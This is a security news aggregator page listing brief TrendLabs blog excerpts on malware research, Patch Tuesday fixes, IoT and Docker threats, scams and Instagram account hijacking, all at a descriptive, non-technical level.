Top IT Security Bloggers

TrendLabs - Malware Blog
  • A Machine Learning Model to Detect Malware Variants

    TrendLabs - Malware Blog
    When malware is difficult to discover — and has limited samples for analysis — we propose a machine learning model that uses adversarial autoencoder and semantic hashing to find what bad actors try to hide. We, along with researchers from the Federation University Australia, discussed this model in our study titled “Generative Malware Outbreak Detection.”
    The post A Machine Learning Model to Detect Malware Variants appeared first on .
  • March’s Patch Tuesday Fixes Privilege Escalation Vulnerabilities Exploited in the Wild

    TrendLabs - Malware Blog
    Microsoft’s Patch Tuesday for March addressed 64 vulnerabilities, 17 of which were rated critical, 45 important, one moderate, and another low in severity. Two of these vulnerabilities, CVE-2019-0797 and CVE-2019-0808, were reported to have been actively exploited in the wild. The patches addressed security flaws in a number of Microsoft products and services: .NET Framework, Edge, Exchange, Internet Explorer, Office, Office Services and Web Apps, NuGet, Team Foundation Server, and Windows. Seven of the vulnerabilities were disclosed via Trend Micro’s Zero Day Initiative (ZDI).
    The post March’s Patch Tuesday Fixes Privilege Escalation Vulnerabilities Exploited in the Wild appeared first on .
  • From Fileless Techniques to Using Steganography: Examining Powload’s Evolution

    TrendLabs - Malware Blog
    In some of the recent Powload-related incidents we saw, we noticed significant changes to some of the attachments in the spam emails: the use of steganography and targeting of specific countries. Figure 2 shows the difference. For example, the samples we analyzed in early 2018 had more straightforward infection chains. These updates added another stage to the execution of malicious routines as a way to evade detection.
    The Powload variants that use these techniques drop and execute the Ursnif and Bebloh data stealers. We did not see any notable differences in the payloads’ routines. The distribution tactics also resemble a spam campaign we uncovered last year, which delivered the same information stealers but distributed via the Cutwail botnet.
    The post From Fileless Techniques to Using Steganography: Examining Powload’s Evolution appeared first on .
  • New SLUB Backdoor Uses GitHub, Communicates via Slack

    TrendLabs - Malware Blog
    We discovered a malware that uses three different online services -- including Slack and GitHub-- as part of its routine. Analysis of the attacker's tools, techniques, and procedures lead us to believe that this might be a targeted attack from very capable threat actors.
    The post New SLUB Backdoor Uses GitHub, Communicates via Slack appeared first on .
  • UPnP-enabled Connected Devices in the Home and Unpatched Known Vulnerabilities

    TrendLabs - Malware Blog
    Many devices such as cameras, printers, and routers use UPnP to make it easy for them to automatically discover and vet other devices on a local network and communicate with each other for data sharing or media streaming. UPnP works with network protocols to configure communications in the network. But with its convenience comes security holes that range from attackers gaining control of devices to bypassing firewall protections.
    We looked into UPnP-related events in home networks and found that many users still have UPnP enabled in their devices.
    The post UPnP-enabled Connected Devices in the Home and Unpatched Known Vulnerabilities appeared first on .
  • Exposed IoT Automation Servers and Cybercrime

    TrendLabs - Malware Blog
    In our latest research we tested possible threat scenarios against complex IoT environments such as in smart homes and smart buildings. A significant part of the research also involved a look into exposed automation platforms or servers, which are integral components of complex IoT environments.
    The post Exposed IoT Automation Servers and Cybercrime appeared first on .
  • Fileless Banking Trojan Targeting Brazilian Banks Downloads Possible Botnet Capability, Info Stealers

    TrendLabs - Malware Blog
    We analyzed a fileless banking trojan targeting three major banks in Brazil and their customers, downloading info stealers, keyloggers and a hack tool. Infected machines can be used for a botnet and mass mailed targeted attacks, and our telemetry recorded the highest infection attempts from Brazil and Taiwan.
    The post Fileless Banking Trojan Targeting Brazilian Banks Downloads Possible Botnet Capability, Info Stealers appeared first on .
  • Exposed Docker Control API and Community Image Abused to Deliver Cryptocurrency-Mining Malware

    TrendLabs - Malware Blog
    Through data analysis of the container honeypots we’ve set up to monitor threats, we’ve uncovered notable activities of undesired or unauthorized cryptocurrency miners being deployed as rogue containers using a community-contributed container image published on Docker Hub. The image is being abused as part of a malicious service that delivers cryptocurrency-mining malware. Networking tools are retrieved to carry out lateral movement on other exposed containers and applications.
    The activities we uncovered are also significant in that they don’t need to exploit vulnerabilities and don’t depend on any version of Docker. Identifying a misconfigured and thus exposed container image is all it could take for attackers to infect many exposed hosts.
    The post Exposed Docker Control API and Community Image Abused to Deliver Cryptocurrency-Mining Malware appeared first on .
  • Shifting Strategies: Using Social Media, SEO in Tech Support Scams

    TrendLabs - Malware Blog
    Tech support scams have diversified into new territory. They now use pop-up alerts and social engineering tactics to spread fake toll-free numbers and links of their fake tech support websites on popular social media platforms.
    The post Shifting Strategies: Using Social Media, SEO in Tech Support Scams appeared first on .
  • How a Hacking Group is Stealing Popular Instagram Profiles

    TrendLabs - Malware Blog
    Social media influencers build and expand their business or brand through credibility and authenticity to their audience. For hackers, however, they could be seen as trophies. That’s what happened to a photographer with more than 15,000 followers on Instagram, when she had her account stolen.
    A closer look into the incident revealed that the hacker got into her account through phishing. While it seemed straightforward enough, we also found that targeting popular Instagram profiles has become a modus for a certain group of Turkish-speaking hackers. And by abusing Instagram’s account recovery process, they were able to keep the stolen account even if the victim squarely followed the process.  We’ve seen cases where owners of Instagram profiles with followers between 15,000 and 70,000 were hacked and were never retrieved. The victims ranged from famous actors and singers to owners of startup businesses like photoshoot equipment rentals.
    The post How a Hacking Group is Stealing Popular Instagram Profiles appeared first on .

Editor's Recommendations

Solution Centres

Brand Page

Events

View all events Submit your own security event

Latest Videos

More videos

Blog Posts

Media Release

More media release